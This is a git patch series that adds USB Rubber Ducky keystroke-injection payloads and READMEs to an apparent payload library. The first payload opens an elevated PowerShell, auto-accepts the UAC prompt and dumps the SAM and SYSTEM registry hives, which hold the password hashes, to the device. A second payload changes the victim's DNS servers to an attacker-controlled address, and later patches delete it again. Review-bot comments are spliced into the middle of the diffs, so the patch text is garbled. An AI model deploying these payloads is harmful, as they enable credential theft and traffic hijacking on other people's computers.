From 554b3066b79c577db4487ccc40ebb6aba233a1e7 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Thu, 31 Oct 2024 12:46:27 +0100
Subject: [PATCH 1/8] Create payload.txt
---
.../exfiltration/NTLM_ducky/payload.txt | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 payloads/library/exfiltration/NTLM_ducky/payload.txt
diff --git a/payloads/library/exfiltration/NTLM_ducky/payload.txt b/payloads/library/exfiltration/NTLM_ducky/payload.txt
new file mode 100644
index 0000000..7cb167e
--- /dev/null
+++ b/payloads/library/exfiltration/NTLM_ducky/payload.txt
@@ -0,0 +1,81 @@
+REM_BLOCK
+TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
+AUTHOR Luu176
+DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
+ on the current Windows device) to the Rubber Ducky's SD card for further analysis.
+ It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
+ the defined storage drive on the Ducky device.
+END_REM
+
+DEFINE #driveLabel DUCKY
+REM below you can set the number of blinks for the caps lock when finished (default 9)
+DEFINE #numBlinks 9
+
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+IF ($_CAPSLOCK_ON == TRUE)
+ CAPSLOCK
+END_IF
+GUI d
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 800
+STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
+GUI d
+WAIT_FOR_CAPS_ON
+REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
+VAR $i = 0
+WHILE ( $i < #numBlinks )
+ DELAY 150
+ CAPSLOCK
+ $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE
From 81ae8f0e8c46e014bb5f0aa6c64e74740e2d1cc8 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Thu, 31 Oct 2024 12:56:53 +0100
Subject: [PATCH 2/8] Create README.md
---
.../library/exfiltration/NTLM_ducky/README.md | 30 +++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 payloads/library/exfiltration/NTLM_ducky/README.md
diff --git a/payloads/library/exfiltration/NTLM_ducky/README.md b/payloads/library/exfiltration/NTLM_ducky/README.md
new file mode 100644
index 0000000..b43d458
--- /dev/null
+++ b/payloads/library/exfiltration/NTLM_ducky/README.md
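Review bot: The DESCRIPTION block and the trailing REM describe the output as "NTLM hash files" named SAM and SYSTEM, but the `reg save` line writes the SAM and SYSTEM registry hives to files named `SAM` and `SYS`, so a reader looking for a SYSTEM file on the card will not find one; either rename the second output (`reg save hklm\system SYSTEM`) or correct the text, e.g. `DESCRIPTION Saves the SAM and SYSTEM registry hives (as files SAM and SYS) to the Ducky's storage partition`. The header should also state the precondition the code relies on, since `ALT y` after `-Verb runAs` appears to answer the UAC prompt blindly: the logged-on account must be able to elevate. Separately, `$_OS` set by PASSIVE_WINDOWS_DETECT is never read although its own REM says "See end of payload for usage within payload", so the extension only acts as a boot delay here; the same holds for the DNS_changer payload hunk in PATCH 4. Either say so in a REM or gate the typing section with the `IF ($_OS == WINDOWS) THEN` shown in the extension's example.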
@@ -0,0 +1,30 @@ +# Exfiltrate NTLM Hash - Windows ✅ + +A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card. + +## Description + +This payload script captures and exfiltrates NTLM hash files from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, onto the Rubber Ducky's SD card for later extraction and analysis. Upon successful file extraction, the payload triggers a visual confirmation by blinking the Caps Lock LED + + +### Settings + +- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`). +- **Number o:** Ensure the payload has the necessary permissions for registry access. +- **Extension Requirements:** This payload includes a passive Windows detection extension for compatibility. + +## Credits + +

Luu176

+
+ + + + +
+ + + +
GitHub +
+
From 4a6e17773dbf4d89a1392b292842e7292fb6827b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Thu, 31 Oct 2024 12:58:23 +0100
Subject: [PATCH 3/8] Update README.md
---
payloads/library/exfiltration/NTLM_ducky/README.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/payloads/library/exfiltration/NTLM_ducky/README.md b/payloads/library/exfiltration/NTLM_ducky/README.md
index b43d458..ee4adfe 100644
--- a/payloads/library/exfiltration/NTLM_ducky/README.md
+++ b/payloads/library/exfiltration/NTLM_ducky/README.md
@@ -10,8 +10,7 @@ This payload script captures and exfiltrates NTLM hash files fr ### Settings - **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`). -- **Number o:** Ensure the payload has the necessary permissions for registry access. -- **Extension Requirements:** This payload includes a passive Windows detection extension for compatibility. +- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks). ## Credits
From 0bb2f83a10e55ba38241899d00b08da4c96ed28b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 15:32:44 +0100
Subject: [PATCH 4/8] Create payload.txt
---
.../library/execution/DNS_changer/payload.txt | 69 +++++++++++++++++++
1 file changed, 69 insertions(+)
create mode 100644 payloads/library/execution/DNS_changer/payload.txt
diff --git a/payloads/library/execution/DNS_changer/payload.txt b/payloads/library/execution/DNS_changer/payload.txt
new file mode 100644
index 0000000..14dd010
--- /dev/null
+++ b/payloads/library/execution/DNS_changer/payload.txt
@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+ DELAY 150
+ CAPSLOCK
+ $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE
From f6fb02fe34d6bb8ec7d350ee92462b88350d7744 Mon Sep 17 00:00:00 2001
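Review bot: The comment `REM wifi interface should be named: Wi-Fi` sits directly above `DEFINE #interface Ethernet` and contradicts the value it is meant to document, and nothing marks `DEFINE #primaryDNS 192.168.1.3` as a placeholder. Replace the comment with `REM #interface must match the adapter alias on the target (e.g. Ethernet or Wi-Fi)` and add `REM #primaryDNS is a private-range placeholder; set both addresses before use`. The sibling NTLM_ducky payload parameterizes the LED loop with `DEFINE #numBlinks 9` while this file hard-codes `WHILE ( $i < 9 )`; reusing that DEFINE keeps the two payloads consistent. The file also lacks the REM_BLOCK TITLE/AUTHOR/DESCRIPTION header the NTLM_ducky payload uses, and its Title says "DNS changer" while the README added in PATCH 5 calls it "DNS Spoofer"; pick one name for both.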
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 15:41:50 +0100
Subject: [PATCH 5/8] Create README.txt
---
.../library/execution/DNS_spoofer/README.txt | 27 +++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 payloads/library/execution/DNS_spoofer/README.txt
diff --git a/payloads/library/execution/DNS_spoofer/README.txt b/payloads/library/execution/DNS_spoofer/README.txt
new file mode 100644
index 0000000..d8e199a
--- /dev/null
+++ b/payloads/library/execution/DNS_spoofer/README.txt
@@ -0,0 +1,27 @@ +# Spoof DNS - Windows ✅ + +DNS Spoofer + +## Description + +A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains. + +### Settings + +* Set the primary and secondary dns servers + +## Credits + +

Luu176

+
+ + + + +
+ + + +
Github +
+
From aa5afab7edd64cd55a0baf04b40e953422053873 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 15:42:11 +0100
Subject: [PATCH 6/8] Rename payload.txt to payload.txt
---
.../library/execution/{DNS_changer => DNS_spoofer}/payload.txt | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename payloads/library/execution/{DNS_changer => DNS_spoofer}/payload.txt (100%)
diff --git a/payloads/library/execution/DNS_changer/payload.txt b/payloads/library/execution/DNS_spoofer/payload.txt
similarity index 100%
rename from payloads/library/execution/DNS_changer/payload.txt
rename to payloads/library/execution/DNS_spoofer/payload.txt
From 9a5857b2af271c5bac293a4b15cc9b042b9cd552 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 22:40:51 +0100
Subject: [PATCH 7/8] Delete payloads/library/execution/DNS_spoofer/README.txt
---
.../library/execution/DNS_spoofer/README.txt | 27 -------------------
1 file changed, 27 deletions(-)
delete mode 100644 payloads/library/execution/DNS_spoofer/README.txt
diff --git a/payloads/library/execution/DNS_spoofer/README.txt b/payloads/library/execution/DNS_spoofer/README.txt
deleted file mode 100644
index d8e199a..0000000
--- a/payloads/library/execution/DNS_spoofer/README.txt
+++ /dev/null
@@ -1,27 +0,0 @@ -# Spoof DNS - Windows ✅ - -DNS Spoofer - -## Description - -A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains. - -### Settings - -* Set the primary and secondary dns servers - -## Credits - -

Luu176

-
- - - - -
- - - -
Github -
-
From aeffdbfcbde65a0da6a07df67442c7d610722443 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 22:41:30 +0100
Subject: [PATCH 8/8] Delete payloads/library/execution/DNS_spoofer/payload.txt
---
.../library/execution/DNS_spoofer/payload.txt | 69 -------------------
1 file changed, 69 deletions(-)
delete mode 100644 payloads/library/execution/DNS_spoofer/payload.txt
diff --git a/payloads/library/execution/DNS_spoofer/payload.txt b/payloads/library/execution/DNS_spoofer/payload.txt
deleted file mode 100644
index 14dd010..0000000
--- a/payloads/library/execution/DNS_spoofer/payload.txt
+++ /dev/null
@@ -1,69 +0,0 @@
-REM Title: DNS changer
-REM Author: luu176
-REM Description: Changes DNS address of windows machine in powershell
-REM Target: Windows 10/11
-
-REM wifi interface should be named: Wi-Fi
-DEFINE #interface Ethernet
-DEFINE #primaryDNS 192.168.1.3
-DEFINE #secondaryDNS 1.1.1.1
-
-EXTENSION PASSIVE_WINDOWS_DETECT
- REM VERSION 1.1
- REM AUTHOR: Korben
-
- REM_BLOCK DOCUMENTATION
- Windows fully passive OS Detection and passive Detect Ready
- Includes its own passive detect ready.
- Does not require additional extensions.
-
- USAGE:
- Extension runs inline (here)
- Place at beginning of payload (besides ATTACKMODE) to act as dynamic
- boot delay
- $_OS will be set to WINDOWS or NOT_WINDOWS
- See end of payload for usage within payload
- END_REM
-
- REM CONFIGURATION:
- DEFINE #MAX_WAIT 150
- DEFINE #CHECK_INTERVAL 20
- DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
- DEFINE #NOT_WINDOWS 7
-
- $_OS = #NOT_WINDOWS
-
- VAR $MAX_TRIES = #MAX_WAIT
- WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
- DELAY #CHECK_INTERVAL
- $MAX_TRIES = ($MAX_TRIES - 1)
- END_WHILE
- IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
- $_OS = WINDOWS
- END_IF
-
- REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
- IF ($_OS == WINDOWS) THEN
- STRING HELLO WINDOWS!
- ELSE
- STRING HELLO WORLD!
- END_IF
- END_REM
-END_EXTENSION
-
-SAVE_HOST_KEYBOARD_LOCK_STATE
-GUI r
-DELAY 150
-STRINGLN powershell Start-Process powershell -Verb runAs
-DELAY 800
-ALT y
-DELAY 500
-STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
-REM below is to blink the LED when payload done
-VAR $i = 0
-WHILE ( $i < 9 )
- DELAY 150
- CAPSLOCK
- $i = ( $i + 1 )
-END_WHILE
-RESTORE_HOST_KEYBOARD_LOCK_STATE